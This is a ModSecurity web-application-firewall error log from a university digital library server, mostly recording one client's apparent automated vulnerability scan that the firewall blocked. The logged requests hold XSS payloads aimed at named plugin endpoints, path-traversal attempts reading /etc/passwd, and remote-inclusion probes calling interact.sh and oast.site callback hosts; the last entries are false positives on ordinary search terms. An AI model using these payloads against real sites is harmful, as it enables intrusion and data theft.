[Tue Aug 29 11:57:01.682338 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAolLA4AAAAe"]
[Tue Aug 29 11:57:02.707462 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq-HnsAAAAT"]
[Tue Aug 29 11:57:02.835917 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAAq-HoAAAAAT"]
[Tue Aug 29 11:57:05.588718 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAArIAe8AAAAX"]
[Tue Aug 29 11:57:07.632120 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AUAAAAV"]
[Tue Aug 29 11:57:07.761479 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAnEqXgAAAAO"]
[Tue Aug 29 11:57:08.626932 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq5@dsAAAAK"]
[Tue Aug 29 11:57:08.813670 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAAq5@eIAAAAK"]
[Tue Aug 29 11:57:11.535766 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAq2KhIAAAAE"]
[Tue Aug 29 11:57:12.237615 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAq5@gkAAAAK"]
[Tue Aug 29 11:57:18.675669 2023] [:error] [pid 2783] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0u3jq1r8ju78xa.oast.site found within TX:1: cjmnijtjmimvgniikdb0u3jq1r8ju78xa.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArfAWsAAAAP"]
[Tue Aug 29 11:57:18.713581 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArdQhAAAAAI"]
[Tue Aug 29 11:57:19.656428 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAoz8doAAAAS"]
[Tue Aug 29 11:57:23.738316 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArbWagAAAAG"]
[Tue Aug 29 11:57:26.138640 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAoz8f0AAAAS"]
[Tue Aug 29 11:57:26.217521 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAqsWEQAAAAB"]
[Tue Aug 29 11:57:27.533259 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArh0SsAAAAC"]
[Tue Aug 29 11:57:30.536933 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArLLkcAAAAb"]
[Tue Aug 29 11:57:30.552672 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArbWbYAAAAG"]
[Tue Aug 29 11:57:30.594320 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArePNAAAAAJ"]
[Tue Aug 29 11:57:31.633310 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAq@sq4AAAAM"]
[Tue Aug 29 11:57:32.784105 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAArh0VgAAAAC"]
[Tue Aug 29 11:57:33.532848 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArePN0AAAAJ"]
[Tue Aug 29 13:07:37.676904 2023] [:error] [pid 4093] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22AKUNTNASI KEUANGAN 1\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2LKcCo-f0AAA-9v0QAAAAY"]
[Tue Aug 29 13:11:51.045605 2023] [:error] [pid 4343] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TIM MKDP\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2MJ8Co-f0AABD3pwcAAAAU"]
[Tue Aug 29 13:48:49.936147 2023] [:error] [pid 4928] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22CBSA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2U0cCo-f0AABNA@TwAAAAF"]
[Tue Aug 29 13:50:09.071472 2023] [:error] [pid 4984] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PEMBELAJAR\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2VIcCo-f0AABN4eOEAAAAN"]
